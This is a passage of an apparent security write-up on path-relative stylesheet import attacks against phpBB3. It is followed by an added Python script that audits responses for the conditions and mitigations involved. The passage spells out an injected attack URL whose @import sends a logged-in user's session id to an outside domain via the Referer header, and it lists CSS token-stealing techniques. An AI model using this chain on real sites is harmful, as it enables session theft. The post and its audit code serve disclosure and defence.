and this page uses the following statement to import an external stylesheet:
The absence of a leading / indicates that the browser should interpret it relative to the current page’s folder. The web browser will calculate this folder (/phpBB3/) from the current URL, and grab the stylesheet from:
Fortunately for us, there is a way to trigger Quirks mode even when the page uses a modern doctype. Internet Explorer allows document modes to be inherited through iframes, so we can force any page to be loaded in Quirks mode by framing it*. phpBB3 doesn’t use any effective anti-framing measures, so we can proceed using this attack route. The following HTML uses a meta tag to ensure Quirks mode is activated, then loads the target page:
<link rel="alternate" type="application/atom+xml" title="Feed - yourdomain.com" href="http://example.com/phpBB3/search.php/
- Extracting page source and stealing CSRF tokens using CSS selectors. This attack is demonstrated by sirdarckcat at http://eaea.sirdarckcat.net/cssar/v2/, and can be adapted to work on hidden inputs.
- Extract page source at high speed by using http://html5sec.org/webkit/test. See http://www.syssec.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf and http://channel9.msdn.com/Events/Blue-Hat-Security-Briefings/BlueHat-Security-Briefings-Fall-2012-Sessions/BH1203 for further details.
- Extracting the page’s URL using http://html5sec.org/cssession
- If the stars are aligned, and you have two injection points on the same line with some sensitive information between, you might be able to extract it in a single request with http://scarybeastsecurity.blogspot.co.uk/2009/12/generic-cross-browser-cross-domain.html (The technique described there no longer works cross-domain, but still works same-domain).
- If the application appends sensitive information to the stylesheet URL, exfiltrate it to an external domain by using @import and watching the Referer header
The last approach might sound quite implausible, but that’s exactly what phpBB3 does. Whenever a logged in user visits
the server redirects them to
where ‘sid’ is their session key, fresh out of their cookie. This key is then appended to the path-relative stylesheet imports:
The attack URL is a bit messy because I had to double-URL-encode it to get through the initial redirect. Also, the redirect encoded and filtered spaces and newlines, so I replaced them with tab and ‘form feed’ characters respectively, courtesy of http://html5sec.org/#45.
- The meta statement triggers Quirks mode.
- The site loads the following URL in an iframe: http://192.168.181.149/phpBB3/adm/index.php/%250C%257B%257D%250C%40
- This results in a redirect to: http://192.168.181.149/phpBB3/adm/index.php/%0C%7B%7D%0C@import%09%27
- The user’s browser renders this page and tries to load the following HTML page as a stylesheet: http://192.168.181.149/phpBB3/adm/index.php/%0C%7B%7D%0C@import%09%27
- When processing this page, the CSS parser reaches and executes the following statement injected via the URL: @import '//portswigger.net/css/ps.css'
The root problem can be resolved by not using path-relative links on systems with flexible path handling. Finally, the vulnerability can be mitigated using the following best-practice steps, which may look awfully familiar:
- Set the server header X-Frame-Options: deny on all pages
- Set the server header X-Content-Type-Options: nosniff on all pages
- Set a modern doctype (eg: <!doctype html>) on all pages
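The two halves of this post, how a path-relative href gets resolved against whatever folder the URL happens to carry, and the three mitigating settings above, can be checked from a captured response. The following Python is an added example, not code from the original post or from phpBB3: it resolves each path-relative stylesheet the way a browser would (RFC 3986 merging via urljoin) after padding the page URL with an extra path segment, and reports whether X-Frame-Options, X-Content-Type-Options: nosniff and an HTML5 doctype are present. The sample responses, the EXTRA-SEGMENT placeholder and the "at_risk" rule (path-relative stylesheet present and any of the three mitigations missing) are constructed assumptions for the demonstration; it only recognises <!doctype html> as a modern doctype, although other strict doctypes also put the page in standards mode.

```python
"""Audit an HTML response for the PRSSI conditions discussed above.

Added example (not from the original post or phpBB3). Reports:
  - path-relative <link rel="stylesheet"> hrefs and where they resolve to once
    the page URL carries an extra path segment (flexible path handling),
  - whether X-Frame-Options, X-Content-Type-Options: nosniff and an HTML5
    doctype are present.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def is_path_relative(href: str) -> bool:
    """True for hrefs such as 'styles/site.css': no scheme, no host and no
    leading '/', so the browser resolves them against the current page's folder."""
    parts = urlsplit(href.strip())
    return (parts.scheme == "" and parts.netloc == ""
            and parts.path != "" and not parts.path.startswith("/"))


def resolve_stylesheet(page_url: str, href: str) -> str:
    """Where the browser will fetch the stylesheet from for this page URL.
    urljoin applies the same RFC 3986 merge rule browsers use."""
    return urljoin(page_url, href)


class _Collector(HTMLParser):
    """Collect stylesheet hrefs and the doctype declaration, if any."""

    def __init__(self):
        super().__init__()
        self.doctype = None
        self.stylesheets = []

    def handle_decl(self, decl):
        if decl.lower().startswith("doctype"):
            self.doctype = " ".join(decl.lower().split())

    def handle_starttag(self, tag, attrs):
        if tag != "link":
            return
        a = {k: (v or "") for k, v in attrs}
        if "stylesheet" in a.get("rel", "").lower().split() and a.get("href"):
            self.stylesheets.append(a["href"])


def audit(page_url: str, headers: dict, html: str) -> dict:
    """Return a report dict for one captured response (headers + body)."""
    h = {k.lower(): v.strip().lower() for k, v in headers.items()}
    p = _Collector()
    p.feed(html)
    p.close()
    path_rel = [href for href in p.stylesheets if is_path_relative(href)]
    # Assumed placeholder segment: shows where the import lands when the server
    # serves the same page regardless of trailing path info.
    padded_url = page_url.rstrip("/") + "/EXTRA-SEGMENT/"
    report = {
        "path_relative_stylesheets": {
            href: resolve_stylesheet(padded_url, href) for href in path_rel
        },
        # Simplification: only the HTML5 doctype is recognised as "modern".
        "modern_doctype": p.doctype == "doctype html",
        "x_frame_options": h.get("x-frame-options") in ("deny", "sameorigin"),
        "nosniff": h.get("x-content-type-options") == "nosniff",
    }
    # Assumed heuristic: exposed if a path-relative import exists and any one of
    # the three mitigations from the post is missing.
    report["at_risk"] = bool(path_rel) and not (
        report["modern_doctype"] and report["x_frame_options"] and report["nosniff"]
    )
    return report


# Constructed sample responses (not real phpBB3 output).
VULNERABLE_HEADERS = {"Content-Type": "text/html"}
VULNERABLE_HTML = (
    '<html><head><title>Board</title>'
    '<link rel="stylesheet" type="text/css" href="styles/site.css">'
    '</head><body></body></html>'
)
HARDENED_HEADERS = {"Content-Type": "text/html", "X-Frame-Options": "DENY",
                    "X-Content-Type-Options": "nosniff"}
HARDENED_HTML = (
    '<!DOCTYPE html><html><head><title>Board</title>'
    '<link rel="stylesheet" href="/phpBB3/styles/site.css">'
    '</head><body></body></html>'
)

if __name__ == "__main__":
    for name, hdrs, body in (("vulnerable", VULNERABLE_HEADERS, VULNERABLE_HTML),
                             ("hardened", HARDENED_HEADERS, HARDENED_HTML)):
        print(name, audit("http://example.com/phpBB3/index.php", hdrs, body))
```

Run against the constructed samples, the vulnerable response reports styles/site.css resolving under the EXTRA-SEGMENT folder with all three mitigations absent, while the hardened response (absolute href, HTML5 doctype, both headers) reports nothing path-relative. The same function can be pointed at saved responses from a proxy; the absolute-href finding is the root fix, the headers and doctype are the defence in depth.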